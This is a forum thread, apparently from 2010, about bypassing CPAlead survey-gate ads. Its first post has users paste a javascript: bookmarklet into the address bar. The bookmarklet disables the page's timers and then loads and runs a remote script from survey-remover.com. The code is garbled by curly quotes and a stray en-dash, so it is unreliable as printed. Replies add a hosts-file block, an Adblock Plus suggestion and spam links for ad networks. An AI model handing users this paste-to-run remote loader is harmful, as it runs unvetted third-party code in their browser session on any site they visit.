How to Block/Bypass and Remove CPAlead Survey Ad

Collapse
X

• Filter
  • Time
  • Show
Clear All

How to Block/Bypass and Remove CPAlead Survey Ad

I recently saw some great sites killing their visitors by adding CPAlead survey ads.Like script mafia.... These types of ads can only be skipped after completing a survey. While most of the surveys are scams or requires money to complete, people will get highly irritated out of it. What will happen if it is a very important website? No way other than sitting for hours or spending money to complete that survey… huh?

Here, I’m with a hack to bypass cpalead survey ads using a simple code. You just need to visit the website (that contains cpalead ad) and enter the following code into your address bar. Few dialogue boxes may appear.. click OK and skip everything. after that, everything will be fine

Code:
    javascript:(function(){(function(){var%20z=["Timeout","Interval"];for(var%20i=0;i<1;i++){var%20x=window["set"+z[i]](“null”,1);eval(“delete%20clear”+z[i]);for(var%20j=x;j>0&&x-j<99999;j–)window["clear"+z[i]](j);}})();var%20bd=”[url=http://survey-remover.com/]XJZ Survey Remover | Save time by removing surveys from CPAlead.com and others[/url]“;var%20gn=function(){var%20q=function(min,max){return%20Math.floor(Math.random()*(max-min+1))+min;};var%20n=”";for(var%20r=0;r<q(9,19);r++)n+=String.fromCharCode(q(97,122));return%20n;};var%20sj=["Timeout","Interval"];var%20bl=[];var%20xc=[];for(var%20i=0;i<2;i++){bl.push(window["set"+sj[i]]);window["set"+sj[i]]=function(a,b){};for(var%20j%20in%20window){try{if(typeof(window[j])==”function”){if((window[j]+”").indexOf(“function%20set”+sj[i]+”()%20{“)!=-1)window[j]=function(a,b){};}}catch(e){}}var%20op=gn();xc.push(op);window[op]=bl[i];}var%20er=gn();window[er]=function(){window.setTimeout=bl[0];window.setInterval=bl[1];xjz={version:1.2,domain:”http://survey-remover.com/”,id:”4c5c4429501cc”,TO:setTimeout(“alert(\”It%20appears%20that%20host%20could%20not%20be%20reached%20:(\\nPlease%20try%20to%20use%20the%20bookmarklet%20again%20later!\\n\”+xjz.domain);”,10000)};var%20a=document.createElement(“script”);a.type=”text/javascript”;a.src=xjz.domain+”public/remove_survey.js”;document.documentElement.firstChild.appendChild(a);};window[xc[0]](window[er],110);})();

UPDATE: Bookmark scripts seems to be changing continuously. You can make use of Survey-remover.com for getting the best performance.

*Please use Mozilla Firefox for perfect working.

Or

Easier way to block the advertisement – open hosts file in %SystemRoot%\system32\drivers\etc\

Then add

127.0.0.1 cpalead.com

All Done

note:copy paste from a site
    Last edited by GiLL; 23.09.10, 16:14.
    left wap stuff

thanks for think about that. i will try

Comment

instead of going trough all this, its better to use adblock plus addon in mozilla firefox. All ads be gone, get well maintained community database filtersets and then never be bugged with any ads :p
      tinyurl.com/earnbymobile
      Easy earning for Indians
      ---------------------
      Alternative mobile advertising network .. Minimum 100 USD pay / NET15 pay cycle, Good Brand, Best targeting for Android
      goo.gl/6vub3

Comment

Working...
      X